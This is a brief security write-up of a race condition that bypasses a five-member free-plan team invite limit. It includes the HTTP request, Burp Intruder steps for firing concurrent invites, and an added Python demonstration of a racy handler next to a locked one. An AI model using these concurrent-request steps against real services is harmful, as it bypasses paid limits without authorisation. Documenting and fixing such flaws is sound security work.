Race Condition bypassing team limit


Severity: Medium

Complexity: Easy

Weakness: Race condition


  • One of the applications under test has functionality to create a team and invite users to it.
  • There is a free limit of inviting 5 users to a team. If you want to invite more users, you are asked to upgrade your plan to Pro.
  • This is the request sent when adding a member to our team.
  • Request:

POST /account/work/team/ HTTP/1.1
Host: www.site.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:49.0) Gecko/20100101 Firefox/49.0
Accept: application/json, text/javascript, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Referer: https://www.site.com/home/work/team/manage
Content-Length: 108
Cookie: <REDACTED>
Connection: close

emails=xxxxxxx@gmail.com&team=name&authenticity_token=<>

  • Send the request to Burp Intruder, adding an email list to the emails= parameter.
  • Set the minimum thread speed (10–15) and start the attack.
  • Result: the limit was bypassed, up to 22.
  • Increasing threading to ~10 sends 10 requests at the same time. This creates a race condition in the limit check, which bypassed their team limit.
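
The server-side pattern behind this kind of bypass, shown as an added example that is not part of the original write-up or the application's code: a check-then-insert invite handler beside a version that checks and writes under one lock. The Team class, the handler names and the example.test addresses are hypothetical, and the barrier is a constructed stand-in for request latency.

```python
import threading

LIMIT = 5  # free-plan invite limit from the write-up


class Team:
    """Hypothetical in-memory stand-in for the application's team table."""

    def __init__(self, size):
        self.members = [f"existing{i}@example.test" for i in range(size)]
        self.lock = threading.Lock()

    def invite_racy(self, email, window):
        # Check-then-act: the count is read here, the write lands later.
        if len(self.members) >= LIMIT:
            return False
        window.wait()  # constructed delay: every request checks before any writes
        self.members.append(email)
        return True

    def invite_atomic(self, email, window):
        # Check and write as one unit; a database would use a row lock or a
        # single transaction here. The window argument is unused.
        with self.lock:
            if len(self.members) >= LIMIT:
                return False
            self.members.append(email)
            return True


def fire(handler, n=10):
    """Send n simultaneous invites; return how many the handler accepted."""
    window = threading.Barrier(n, timeout=5)
    accepted = []

    def worker(i):
        accepted.append(handler(f"new{i}@example.test", window))

    threads = [threading.Thread(target=worker, args=(i,)) for i in range(n)]
    for t in threads:
        t.start()
    for t in threads:
        t.join()
    return sum(accepted)


if __name__ == "__main__":
    racy, safe = Team(4), Team(4)
    print("racy:", fire(racy.invite_racy), "accepted, size", len(racy.members))
    print("atomic:", fire(safe.invite_atomic), "accepted, size", len(safe.members))
```

With four existing members, the racy handler accepts all ten simultaneous invites because each request read the count before any write landed; the locked handler accepts exactly one.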